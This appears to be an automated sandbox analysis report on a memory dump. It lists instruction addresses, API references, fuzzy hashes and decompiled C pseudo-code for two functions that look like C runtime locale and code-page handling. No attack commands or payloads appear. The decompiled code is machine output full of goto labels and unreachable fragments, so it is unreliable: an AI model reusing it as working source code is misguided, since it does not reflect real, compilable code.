0x6e1dab64
0x6e1dab52
0x6e1dab52
0x6e1dab57
0x6e1dab59
0x00000000
0x6e1dab5b
0x6e1dab5d
0x6e1dab5d
0x6e1dab59
0x6e1dab66
0x6e1dab69
0x6e1dab71
0x6e1dab85
0x6e1dab8d
0x6e1dab8f
0x6e1dab9d
0x6e1dab9f
0x6e1dab91
0x6e1dab91
0x6e1dab94
0x00000000
0x6e1dab96
0x6e1dab98
0x6e1dab98
0x6e1dab94
0x6e1dabb4
0x6e1dabbd
0x6e1dabbf
0x6e1dabce
0x6e1dabd1
0x6e1dabc1
0x6e1dabc1
0x6e1dabc4
0x00000000
0x6e1dabc6
0x6e1dabc9
0x6e1dabc9
0x6e1dabc4
0x6e1dabbf
0x6e1dabdb
0x6e1dabe5
0x6e1dabea
0x6e1dabef
0x6e1dabf4
0x6e1dabf4
0x6e1daaf1
0x6e1daadf
0x6e1da90a
0x6e1da90a
0x6e1da910
0x6e1da915
0x6e1da94b
0x6e1da94c
0x6e1da952
0x6e1da954
0x6e1da954
0x6e1da957
0x6e1da957
0x6e1da959
0x6e1da95a
0x6e1da960
0x6e1da96b
0x6e1da970
0x6e1da975
0x6e1da97f
0x00000000
0x6e1da985
0x6e1da985
0x6e1da987
0x6e1da988
0x6e1da988
0x6e1da98b
0x6e1da98b
0x6e1da98d
0x6e1da98e
0x6e1da995
0x6e1da99a
0x6e1da99f
0x6e1da9a4
0x6e1da9ac
0x6e1da9ad
0x6e1da9b3
0x6e1da9b8
0x6e1da9bd
0x6e1da9c3
0x6e1da9c8
0x6e1da9c9
0x6e1da9cc
0x00000000
0x00000000
0x00000000
0x6e1da9cc
0x6e1da9ce
0x6e1da9d0
0x6e1da9d4
0x6e1da9d6
0x6e1da9d6
0x6e1da9de
0x6e1da9e4
0x6e1da9e7
0x6e1da9e7
0x6e1da9ec
0x00000000
0x00000000
0x6e1da9f5
0x6e1da9f5
0x6e1da9f8
0x6e1da9fb
0x6e1da9fd
0x6e1daa0b
0x6e1daa0d
0x6e1daa0f
0x6e1daa12
0x6e1daa14
0x6e1daa16
0x6e1daa18
0x6e1daa18
0x6e1daa1a
0x6e1daa1d
0x00000000
0x00000000
0x6e1daa1f
0x6e1daa20
0x6e1daa22
0x6e1daa24
0x6e1daa26
0x00000000
0x00000000
0x00000000
0x6e1daa26
0x6e1daa18
0x6e1daa28
0x6e1daa28
0x6e1daa2a
0x6e1daa2c
0x6e1daa37
0x6e1daa39
0x6e1daa43
0x6e1daa43
0x6e1daa45
0x6e1daa47
0x00000000
0x00000000
0x6e1daa3e
0x6e1daa40
0x6e1daa42
0x6e1daa42
0x00000000
0x6e1daa42
0x00000000
0x6e1daa40
0x6e1daa43
0x6e1daa2a
0x6e1daa49
0x6e1daa49
0x6e1daa4c
0x6e1daa50
0x6e1daa50
0x6e1daa53
0x6e1daa57
0x6e1daa5c
0x6e1daa62
0x6e1daa65
0x6e1daa67
0x6e1daa7d
0x6e1daa80
0x6e1daa88
0x6e1daa8d
0x6e1daa92
0x00000000
0x6e1daa92
0x6e1daa69
0x6e1daa6f
0x6e1daa74
0x6e1daa77
0x6e1daa79
0x00000000
0x6e1daa7b
0x6e1daa79
0x6e1da9bd
0x00000000
0x6e1da9a4
0x6e1da917
0x6e1da917
0x6e1da919
0x6e1da91b
0x6e1da91b
0x6e1da91f
0x00000000
0x00000000
0x6e1da923
0x6e1da937
0x6e1da937
0x6e1da925
0x6e1da925
0x6e1da92b
0x00000000
0x6e1da92d
0x6e1da92d
0x6e1da930
0x6e1da935
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1da935
0x6e1da92b
0x6e1da940
0x6e1da942
0x6e1daa97
0x6e1daa97
0x6e1da948
0x6e1da948
0x00000000
0x6e1da948
0x00000000
0x6e1da942
0x6e1da93b
0x6e1da93d
0x6e1da93d
0x00000000
0x6e1da93d
0x6e1da915
0x00000000

APIs

_free.LIBCMT ref: 6E1DA94C
_free.LIBCMT ref: 6E1DA970
_free.LIBCMT ref: 6E1DAAFD
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6E1F61D0), ref: 6E1DAB0F
_free.LIBCMT ref: 6E1DACC9

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$InformationTimeZone
String ID:
API String ID: 597776487-0
Opcode ID: a47f794b13e7643d4ffc4428831ac0f7e468c92878a88fa722e4bbcc8cb0f745
Instruction ID: 0c10d7a81cc5c0084ec38bc40a01086d74896ab69673fe2ffa9a7063b90b864c
Opcode Fuzzy Hash: a47f794b13e7643d4ffc4428831ac0f7e468c92878a88fa722e4bbcc8cb0f745
Instruction Fuzzy Hash: DFC16A72904205AFDB14CFF8C850ADEBBBEEF16314F244969D491D7280E7358ACAE750

Uniqueness

Uniqueness Score: -1.00%

Function 6E196C85, Relevance: 7.7, APIs: 5, Instructions: 222
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E6E196C85(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, int _a16, char* _a20, int _a24, int _a28) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				int _v32;
				char* _v36;
				short* _v40;
				int _v44;
				short* _v48;
				short* _v52;
				intOrPtr _v56;
				void* _v68;
				signed int _t54;
				signed int _t65;
				signed int _t66;
				short* _t69;
				signed int _t71;
				signed int _t72;
				char* _t77;
				char* _t78;
				int _t82;
				intOrPtr _t91;
				intOrPtr _t92;
				intOrPtr _t99;
				intOrPtr _t100;
				intOrPtr* _t102;
				short* _t103;
				int _t105;
				short* _t107;
				intOrPtr* _t108;
				signed int _t109;
				short* _t110;

				_t54 =  *0x6e21801c; // 0x57d971a9
				_v8 = _t54 ^ _t109;
				_t105 = _a16;
				_v56 = _a4;
				_t57 = _a20;
				_v36 = _a20;
				_t102 = _a12;
				_v32 = _t102;
				if(_t105 <= 0) {
					if(_t105 < 0xffffffff) {
						L56:
						L57:
						return E6E1A93EA(_v8 ^ _t109);
					}
					L3:
					_t82 = _a24;
					if(_t82 <= 0) {
						if(_t82 < 0xffffffff) {
							goto L56;
						}
						L6:
						if(_t105 == 0 || _t82 == 0) {
							if(_t105 == _t82) {
								L55:
								_push(2);
								L20:
								goto L57;
							}
							if(_t82 > 1) {
								L29:
								goto L57;
							}
							if(_t105 > 1) {
								L19:
								_push(3);
								goto L20;
							}
							if(GetCPInfo(_a28,  &_v28) == 0) {
								goto L56;
							}
							if(_t105 <= 0) {
								if(_t82 <= 0) {
									goto L30;
								}
								if(_v28 < 2) {
									goto L29;
								}
								_t77 =  &_v22;
								if(_v22 == 0) {
									goto L29;
								}
								_t108 = _v36;
								while(1) {
									_t91 =  *((intOrPtr*)(_t77 + 1));
									if(_t91 == 0) {
										goto L29;
									}
									_t99 =  *_t108;
									if(_t99 <  *_t77 || _t99 > _t91) {
										_t77 = _t77 + 2;
										if( *_t77 != 0) {
											continue;
										}
										goto L29;
									} else {
										goto L55;
									}
								}
								goto L29;
							}
							if(_v28 < 2) {
								goto L19;
							}
							_t78 =  &_v22;
							if(_v22 == 0) {
								goto L19;
							} else {
								goto L15;
							}
							while(1) {
								L15:
								_t92 =  *((intOrPtr*)(_t78 + 1));
								if(_t92 == 0) {
									goto L19;
								}
								_t100 =  *_t102;
								if(_t100 <  *_t78 || _t100 > _t92) {
									_t78 = _t78 + 2;
									if( *_t78 != 0) {
										continue;
									}
									goto L19;
								} else {
									goto L55;
								}
							}
							goto L19;
						} else {
							L30:
							_t103 = 0;
							_t65 = MultiByteToWideChar(_a28, 9, _v32, _t105, 0, 0);
							_v44 = _t65;
							if(_t65 == 0) {
								goto L56;
							}
							asm("sbb eax, eax");
							_t66 = _t65 & _t65 + _t65 + 0x00000008;
							if(_t66 == 0) {
								_v52 = 0;
								L54:
								E6E192B92( &_v52);
								goto L57;
							}
							if(_t66 > 0x400) {
								_push(_t66);
								_t69 = E6E1C2370();
								_v40 = _t69;
								if(_t69 == 0) {
									L38:
									_v52 = _t69;
									if(_t69 == 0 || MultiByteToWideChar(_a28, 1, _v32, _t105, _t69, _v44) == 0) {
										goto L54;
									} else {
										_t71 = MultiByteToWideChar(_a28, 9, _v36, _t82, _t103, _t103);
										_v32 = _t71;
										if(_t71 == 0) {
											goto L54;
										}
										asm("sbb eax, eax");
										_t72 = _t71 & _t71 + _t71 + 0x00000008;
										if(_t72 == 0) {
											_v48 = _t103;
											L52:
											E6E192B92( &_v48);
											goto L54;
										}
										if(_t72 > 0x400) {
											_push(_t72);
											_t107 = E6E1C2370();
											if(_t107 == 0) {
												L48:
												_v48 = _t107;
												if(_t107 != 0 && MultiByteToWideChar(_a28, 1, _v36, _t82, _t107, _v32) != 0) {
													_t103 = E6E196F6D(_v56, _a8, _v40, _v44, _t107, _v32);
												}
												goto L52;
											}
											 *_t107 = 0xdddd;
											L47:
											_t107 =  &(_t107[4]);
											goto L48;
										}
										E6E1AA000();
										_t107 = _t110;
										if(_t107 == 0) {
											goto L48;
										}
										 *_t107 = 0xcccc;
										goto L47;
									}
								}
								 *_t69 = 0xdddd;
								L37:
								_t69 =  &(_t69[4]);
								_v40 = _t69;
								goto L38;
							}
							E6E1AA000();
							_t69 = _t110;
							_v40 = _t69;
							if(_t69 == 0) {
								goto L38;
							}
							 *_t69 = 0xcccc;
							goto L37;
						}
					}
					_t82 = E6E1C4D1B(_t57, _t82);
					goto L6;
				}
				_t105 = E6E1C4D1B(_t102, _t105);
				_t57 = _v36;
				goto L3;
			}

0x6e196c8b
0x6e196c92
0x6e196c9a
0x6e196c9d
0x6e196ca0
0x6e196ca3
0x6e196ca7
0x6e196caa
0x6e196caf
0x6e196cc4
0x6e196ed6
0x6e196ed8
0x6e196ee9
0x6e196ee9
0x6e196cca
0x6e196cca
0x6e196ccf
0x6e196ce1
0x00000000
0x00000000
0x6e196ce7
0x6e196ce9
0x6e196cf5
0x6e196ecf
0x6e196ecf
0x6e196d50
0x00000000
0x6e196d50
0x6e196cfe
0x6e196d89
0x00000000
0x6e196d8b
0x6e196d07
0x6e196d4e
0x6e196d4e
0x00000000
0x6e196d4e
0x6e196d18
0x00000000
0x00000000
0x6e196d20
0x6e196d58
0x00000000
0x00000000
0x6e196d5e
0x00000000
0x00000000
0x6e196d64
0x6e196d67
0x00000000
0x00000000
0x6e196d69
0x6e196d6c
0x6e196d6c
0x6e196d71
0x00000000
0x00000000
0x6e196d73
0x6e196d77
0x6e196d81
0x6e196d87
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e196d77
0x00000000
0x6e196d6c
0x6e196d26
0x00000000
0x00000000
0x6e196d2c
0x6e196d2f
0x00000000
0x00000000
0x00000000
0x00000000
0x6e196d31
0x6e196d31
0x6e196d31
0x6e196d36
0x00000000
0x00000000
0x6e196d38
0x6e196d3c
0x6e196d46
0x6e196d4c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e196d3c
0x00000000
0x6e196d91
0x6e196d91
0x6e196d91
0x6e196d9e
0x6e196da4
0x6e196da9
0x00000000
0x00000000
0x6e196db7
0x6e196db9
0x6e196dbb
0x6e196ec0
0x6e196ec3
0x6e196ec6
0x00000000
0x6e196ecb
0x6e196dc6
0x6e196dde
0x6e196ddf
0x6e196de4
0x6e196dea
0x6e196df8
0x6e196df8
0x6e196dfd
0x00000000
0x6e196e1e
0x6e196e2a
0x6e196e30
0x6e196e35
0x00000000
0x00000000
0x6e196e43
0x6e196e45
0x6e196e47
0x6e196eb3
0x6e196eb6
0x6e196eb9
0x00000000
0x6e196eb9
0x6e196e4e
0x6e196e63
0x6e196e69
0x6e196e6e
0x6e196e79
0x6e196e79
0x6e196e7e
0x6e196eaf
0x6e196eaf
0x00000000
0x6e196e7e
0x6e196e70
0x6e196e76
0x6e196e76
0x00000000
0x6e196e76
0x6e196e50
0x6e196e55
0x6e196e59
0x00000000
0x00000000
0x6e196e5b
0x00000000
0x6e196e5b
0x6e196dfd
0x6e196dec
0x6e196df2
0x6e196df2
0x6e196df5
0x00000000
0x6e196df5
0x6e196dc8
0x6e196dcd
0x6e196dcf
0x6e196dd4
0x00000000
0x00000000
0x6e196dd6
0x00000000
0x6e196dd6
0x6e196ce9
0x6e196cda
0x00000000
0x6e196cda
0x6e196cb9
0x6e196cbb
0x00000000

APIs

GetCPInfo.KERNEL32(?,?,?,?,?), ref: 6E196D10
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 6E196D9E
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 6E196E10
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 6E196E2A
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 6E196E8D

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$Info
String ID:
API String ID: 1775632426-0
Opcode ID: fcf76f7c005852f0c8d54821da82452fb4fe7fbab587ea8ce215af2056e665c1
Instruction ID: dde772487fc6bbaf4973b3aab9e5eee6f2a558edef38372391c1d2325e672a61
Opcode Fuzzy Hash: fcf76f7c005852f0c8d54821da82452fb4fe7fbab587ea8ce215af2056e665c1
Instruction Fuzzy Hash: 9071CF32D2021E9BEF11CEE5CD60AEE7BB9AF26714F210419E864A7150D7358884FBF0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D0995, Relevance: 7.7, APIs: 5, Instructions: 186
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6E1D0995(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags, void* __fp0, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v60;
				char _v276;
				short _v278;
				short _v280;
				char _v448;
				signed int _v452;
				short _v454;
				intOrPtr _v456;
				signed int _v460;
				intOrPtr _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr _v512;
				char _v536;
				intOrPtr _v540;
				signed int _v544;
				intOrPtr _v548;
				signed int _v560;
				char _v708;
				signed int _v712;
				short _v714;
				signed int* _v716;
				signed int _v720;
				signed int _v724;
				signed int _v728;
				signed int* _v732;
				intOrPtr _v736;
				signed int _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				char _v824;
				char _v1252;
				char _v1264;
				intOrPtr _v1276;
				signed int _v1288;
				signed short _v1324;
				void* __ebp;
				signed int _t242;
				void* _t245;
				signed int _t248;
				signed int _t250;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t263;
				signed int _t265;
				void* _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int _t272;
				signed int _t275;
				signed int _t282;
				signed int _t285;
				signed int _t286;
				intOrPtr _t287;
				signed int _t290;
				signed int _t292;
				intOrPtr _t293;
				signed int _t296;
				signed int _t298;
				void* _t299;
				signed int _t305;
				signed int _t306;
				signed int _t308;
				signed int _t328;
				signed int _t330;
				signed int _t332;
				signed int _t337;
				void* _t339;
				signed int _t341;
				void* _t342;
				intOrPtr _t343;
				signed int _t348;
				signed int _t349;
				intOrPtr* _t354;
				signed int _t368;
				signed int _t370;
				signed int _t372;
				intOrPtr* _t373;
				signed int _t375;
				void* _t380;
				intOrPtr* _t385;
				intOrPtr* _t388;
				void* _t391;
				signed int _t392;
				intOrPtr* _t395;
				intOrPtr* _t396;
				signed int _t405;
				intOrPtr _t408;
				intOrPtr* _t409;
				signed int _t411;
				signed int* _t415;
				signed int _t416;
				intOrPtr* _t422;
				intOrPtr* _t423;
				signed int _t432;
				short _t433;
				void* _t434;
				void* _t436;
				signed int _t437;
				signed int _t439;
				intOrPtr _t440;
				signed int _t443;
				intOrPtr _t444;
				signed int _t446;
				signed int _t449;
				intOrPtr _t455;
				signed int _t456;
				signed int _t458;
				signed int _t459;
				signed int _t463;
				signed int _t465;
				signed int _t468;
				signed int* _t469;
				intOrPtr* _t470;
				short _t471;
				signed int _t473;
				signed int _t474;
				void* _t476;
				void* _t477;
				signed int _t478;
				void* _t479;
				void* _t480;
				signed int _t481;
				void* _t483;
				void* _t484;
				signed int _t496;

				_t500 = __fp0;
				_t431 = __edx;
				_push(__ebx);
				_push(__esi);
				_v12 = 1;
				_t368 = E6E1D1C1E(0x6a6);
				_t241 = 0;
				_pop(_t380);
				if(_t368 == 0) {
					L20:
					return _t241;
				} else {
					_push(__edi);
					_t2 = _t368 + 4; // 0x4
					_t439 = _t2;
					 *_t439 = 0;
					 *_t368 = 1;
					_t455 = _a4;
					_t242 = _t455 + 0x30;
					_push( *_t242);
					_v16 = _t242;
					_push(0x6e1f50f0);
					_push( *0x6e1f502c);
					E6E1D08D1(_t368, _t380, __edx, _t439, _t455, __fp0, _t439, 0x351, 3);
					_t477 = _t476 + 0x18;
					_v8 = 0x6e1f502c;
					while(1) {
						L2:
						_t245 = E6E1DE4A9(_t439, 0x351, 0x6e1f50ec);
						_t478 = _t477 + 0xc;
						if(_t245 != 0) {
							break;
						} else {
							_t8 = _v16 + 0x10; // 0x10
							_t422 = _t8;
							_t348 =  *_v16;
							_v16 = _t422;
							_t423 =  *_t422;
							_v20 = _t423;
							goto L4;
						}
						while(1) {
							L4:
							_t431 =  *_t348;
							if(_t431 !=  *_t423) {
								break;
							}
							if(_t431 == 0) {
								L8:
								_t349 = 0;
							} else {
								_t431 =  *((intOrPtr*)(_t348 + 2));
								if(_t431 !=  *((intOrPtr*)(_t423 + 2))) {
									break;
								} else {
									_t348 = _t348 + 4;
									_t423 = _t423 + 4;
									if(_t431 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							_push(_v20);
							_push(0x6e1f50f0);
							asm("sbb eax, eax");
							_v12 = _v12 &  !( ~_t349);
							_t354 = _v8 + 0xc;
							_v8 = _t354;
							_push( *_t354);
							E6E1D08D1(_t368, _t423, _t431, _t439, _t455, _t500, _t439, 0x351, 3);
							_t477 = _t478 + 0x18;
							if(_v8 < 0x6e1f505c) {
								goto L2;
							} else {
								if(_v12 != 0) {
									E6E1D1BE4(_t368);
									_t446 = _t439 | 0xffffffff;
									__eflags =  *(_t455 + 0x28);
									if(__eflags != 0) {
										asm("lock xadd [ecx], eax");
										if(__eflags == 0) {
											E6E1D1BE4( *(_t455 + 0x28));
										}
									}
									__eflags =  *(_t455 + 0x24);
									if( *(_t455 + 0x24) != 0) {
										asm("lock xadd [eax], edi");
										__eflags = _t446 == 1;
										if(_t446 == 1) {
											E6E1D1BE4( *(_t455 + 0x24));
										}
									}
									 *(_t455 + 0x24) = 0;
									 *(_t455 + 0x1c) = 0;
									 *(_t455 + 0x28) = 0;
									 *((intOrPtr*)(_t455 + 0x20)) = 0;
									_t241 =  *((intOrPtr*)(_t455 + 0x40));
								} else {
									_t449 = _t439 | 0xffffffff;
									_t496 =  *(_t455 + 0x28);
									if(_t496 != 0) {
										asm("lock xadd [ecx], eax");
										if(_t496 == 0) {
											E6E1D1BE4( *(_t455 + 0x28));
										}
									}
									if( *(_t455 + 0x24) != 0) {
										asm("lock xadd [eax], edi");
										if(_t449 == 1) {
											E6E1D1BE4( *(_t455 + 0x24));
										}
									}
									 *(_t455 + 0x24) =  *(_t455 + 0x24) & 0x00000000;
									_t28 = _t368 + 4; // 0x4
									_t241 = _t28;
									 *(_t455 + 0x1c) =  *(_t455 + 0x1c) & 0x00000000;
									 *(_t455 + 0x28) = _t368;
									 *((intOrPtr*)(_t455 + 0x20)) = _t241;
								}
								goto L20;
							}
							goto L137;
						}
						asm("sbb eax, eax");
						_t349 = _t348 | 0x00000001;
						__eflags = _t349;
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E6E1C22EF();
					asm("int3");
					_t473 = _t478;
					_t479 = _t478 - 0x1d0;
					_t248 =  *0x6e21801c; // 0x57d971a9
					_v60 = _t248 ^ _t473;
					_t250 = _v44;
					_push(_t368);
					_push(_t455);
					_t456 = _v40;
					_push(_t439);
					_t440 = _v48;
					_v512 = _t440;
					__eflags = _t250;
					if(_t250 == 0) {
						_v460 = 1;
						_v472 = 0;
						_t370 = 0;
						_v452 = 0;
						__eflags = _t456;
						if(__eflags == 0) {
							L80:
							E6E1D0995(_t370, _t431, _t440, _t456, __eflags, _t500, _t440);
							goto L81;
						} else {
							__eflags =  *_t456 - 0x4c;
							if( *_t456 != 0x4c) {
								L60:
								_t257 = E6E1D02A7(_t431, _t500, _t456,  &_v276, 0x83,  &_v448, 0x55,  &_v468);
								_t480 = _t479 + 0x18;
								__eflags = _t257;
								if(_t257 != 0) {
									__eflags = 0;
									_t432 = _t440 + 0x20;
									_t458 = 0;
									_v452 = _t432;
									do {
										__eflags = _t458;
										if(_t458 == 0) {
											L75:
											_t258 = _v460;
										} else {
											_t385 =  *_t432;
											_t259 =  &_v276;
											while(1) {
												__eflags =  *_t259 -  *_t385;
												_t440 = _v464;
												if( *_t259 !=  *_t385) {
													break;
												}
												__eflags =  *_t259;
												if( *_t259 == 0) {
													L68:
													_t260 = 0;
												} else {
													_t433 =  *((intOrPtr*)(_t259 + 2));
													__eflags = _t433 -  *((intOrPtr*)(_t385 + 2));
													_v454 = _t433;
													_t432 = _v452;
													if(_t433 !=  *((intOrPtr*)(_t385 + 2))) {
														break;
													} else {
														_t259 = _t259 + 4;
														_t385 = _t385 + 4;
														__eflags = _v454;
														if(_v454 != 0) {
															continue;
														} else {
															goto L68;
														}
													}
												}
												L70:
												__eflags = _t260;
												if(_t260 == 0) {
													_t370 = _t370 + 1;
													__eflags = _t370;
													goto L75;
												} else {
													_t261 =  &_v276;
													_push(_t261);
													_push(_t458);
													_push(_t440);
													L84();
													_t432 = _v452;
													_t480 = _t480 + 0xc;
													__eflags = _t261;
													if(_t261 == 0) {
														_t258 = 0;
														_v460 = 0;
													} else {
														_t370 = _t370 + 1;
														goto L75;
													}
												}
												goto L76;
											}
											asm("sbb eax, eax");
											_t260 = _t259 | 0x00000001;
											__eflags = 0;
											goto L70;
										}
										L76:
										_t458 = _t458 + 1;
										_t432 = _t432 + 0x10;
										_v452 = _t432;
										__eflags = _t458 - 5;
									} while (_t458 <= 5);
									__eflags = _t258;
									if(__eflags != 0) {
										goto L80;
									} else {
										__eflags = _t370;
										if(__eflags != 0) {
											goto L80;
										} else {
										}
									}
								}
								goto L81;
							} else {
								__eflags =  *(_t456 + 2) - 0x43;
								if( *(_t456 + 2) != 0x43) {
									goto L60;
								} else {
									__eflags =  *((short*)(_t456 + 4)) - 0x5f;
									if( *((short*)(_t456 + 4)) != 0x5f) {
										goto L60;
									} else {
										while(1) {
											_t263 = E6E1DE73F(_t456, 0x6e1f50e4);
											_t372 = _t263;
											_v468 = _t372;
											_pop(_t387);
											__eflags = _t372;
											if(_t372 == 0) {
												break;
											}
											_t265 = _t263 - _t456;
											__eflags = _t265;
											_v460 = _t265 >> 1;
											if(_t265 == 0) {
												break;
											} else {
												_t267 = 0x3b;
												__eflags =  *_t372 - _t267;
												if( *_t372 == _t267) {
													break;
												} else {
													_t443 = _v460;
													_t373 = 0x6e1f502c;
													_v456 = 1;
													do {
														_t268 = E6E1CF02C( *_t373, _t456, _t443);
														_t479 = _t479 + 0xc;
														__eflags = _t268;
														if(_t268 != 0) {
															goto L46;
														} else {
															_t388 =  *_t373;
															_t434 = _t388 + 2;
															do {
																_t343 =  *_t388;
																_t388 = _t388 + 2;
																__eflags = _t343 - _v472;
															} while (_t343 != _v472);
															_t387 = _t388 - _t434 >> 1;
															__eflags = _t443 - _t388 - _t434 >> 1;
															if(_t443 != _t388 - _t434 >> 1) {
																goto L46;
															}
														}
														break;
														L46:
														_v456 = _v456 + 1;
														_t373 = _t373 + 0xc;
														__eflags = _t373 - 0x6e1f505c;
													} while (_t373 <= 0x6e1f505c);
													_t370 = _v468 + 2;
													_t269 = E6E1DE6E6(_t387, _t370, 0x6e1f50ec);
													_t440 = _v464;
													_t459 = _t269;
													_pop(_t391);
													__eflags = _t459;
													if(_t459 != 0) {
														L49:
														__eflags = _v456 - 5;
														if(_v456 > 5) {
															_t392 = _v452;
															goto L55;
														} else {
															_push(_t459);
															_t272 = E6E1DE6DB( &_v276, 0x83, _t370);
															_t481 = _t479 + 0x10;
															__eflags = _t272;
															if(_t272 != 0) {
																L83:
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																E6E1C22EF();
																asm("int3");
																_push(_t473);
																_t474 = _t481;
																_t275 =  *0x6e21801c; // 0x57d971a9
																_v560 = _t275 ^ _t474;
																_push(_t370);
																_t375 = _v544;
																_push(_t459);
																_push(_t440);
																_t444 = _v548;
																_v1288 = _t375;
																_v1276 = E6E1CF749(_t391, _t431, _t500) + 0x278;
																_t282 = E6E1D02A7(_t431, _t500, _v540,  &_v824, 0x83,  &_v1252, 0x55,  &_v1264);
																_t483 = _t481 - 0x2e4 + 0x18;
																__eflags = _t282;
																if(_t282 == 0) {
																	L124:
																	__eflags = 0;
																	goto L125;
																} else {
																	_t103 = _t375 + 2; // 0x6
																	_t463 = _t103 << 4;
																	__eflags = _t463;
																	_t285 =  &_v280;
																	_v724 = _t463;
																	_t395 =  *((intOrPtr*)(_t463 + _t444));
																	while(1) {
																		_v712 = _v712 & 0x00000000;
																		__eflags =  *_t285 -  *_t395;
																		_t465 = _v724;
																		if( *_t285 !=  *_t395) {
																			break;
																		}
																		__eflags =  *_t285;
																		if( *_t285 == 0) {
																			L91:
																			_t286 = _v712;
																		} else {
																			_t471 =  *((intOrPtr*)(_t285 + 2));
																			__eflags = _t471 -  *((intOrPtr*)(_t395 + 2));
																			_v714 = _t471;
																			_t465 = _v724;
																			if(_t471 !=  *((intOrPtr*)(_t395 + 2))) {
																				break;
																			} else {
																				_t285 = _t285 + 4;
																				_t395 = _t395 + 4;
																				__eflags = _v714;
																				if(_v714 != 0) {
																					continue;
																				} else {
																					goto L91;
																				}
																			}
																		}
																		L93:
																		__eflags = _t286;
																		if(_t286 != 0) {
																			_t396 =  &_v280;
																			_t436 = _t396 + 2;
																			do {
																				_t287 =  *_t396;
																				_t396 = _t396 + 2;
																				__eflags = _t287 - _v712;
																			} while (_t287 != _v712);
																			_v728 = (_t396 - _t436 >> 1) + 1;
																			_t290 = E6E1D1C1E(4 + ((_t396 - _t436 >> 1) + 1) * 2);
																			_v740 = _t290;
																			__eflags = _t290;
																			if(_t290 == 0) {
																				goto L124;
																			} else {
																				_v736 =  *((intOrPtr*)(_t465 + _t444));
																				_v748 =  *(_t444 + 0xa0 + _t375 * 4);
																				_v752 =  *(_t444 + 8);
																				_v716 = _t290 + 4;
																				_t292 = E6E1CB0B9(_t290 + 4, _v728,  &_v280);
																				_t484 = _t483 + 0xc;
																				__eflags = _t292;
																				if(_t292 != 0) {
																					_t293 = _v736;
																					_push(_t293);
																					_push(_t293);
																					_push(_t293);
																					_push(_t293);
																					_push(_t293);
																					E6E1C22EF();
																					asm("int3");
																					_push(_t474);
																					_t296 = (_v1324 & 0x0000ffff) - 0x2d;
																					__eflags = _t296;
																					if(_t296 == 0) {
																						L136:
																						__eflags = 0;
																						return 0;
																					} else {
																						_t298 = _t296 - 1;
																						__eflags = _t298;
																						if(_t298 == 0) {
																							_t299 = 2;
																							return _t299;
																						} else {
																							__eflags = _t298 == 0x31;
																							if(_t298 == 0x31) {
																								goto L136;
																							} else {
																								__eflags = 1;
																								return 1;
																							}
																						}
																					}
																				} else {
																					__eflags = _v280 - 0x43;
																					 *((intOrPtr*)(_t465 + _t444)) = _v716;
																					if(_v280 != 0x43) {
																						L102:
																						_t305 = E6E1CFF49(_t375, _t444,  &_v708);
																						_t405 = _v712;
																					} else {
																						__eflags = _v278;
																						if(_v278 != 0) {
																							goto L102;
																						} else {
																							_t405 = _v712;
																							_t305 = _t405;
																						}
																					}
																					 *(_t444 + 0xa0 + _t375 * 4) = _t305;
																					__eflags = _t375 - 2;
																					if(_t375 != 2) {
																						__eflags = _t375 - 1;
																						if(_t375 != 1) {
																							__eflags = _t375 - 5;
																							if(_t375 == 5) {
																								 *((intOrPtr*)(_t444 + 0x14)) = _v720;
																							}
																						} else {
																							 *((intOrPtr*)(_t444 + 0x10)) = _v720;
																						}
																					} else {
																						_t469 = _v732;
																						_t437 = _t405;
																						_t415 = _t469;
																						 *(_t444 + 8) = _v720;
																						_v716 = _t469;
																						_v728 = _t469[8];
																						_v720 = _t469[9];
																						while(1) {
																							__eflags =  *(_t444 + 8) -  *_t415;
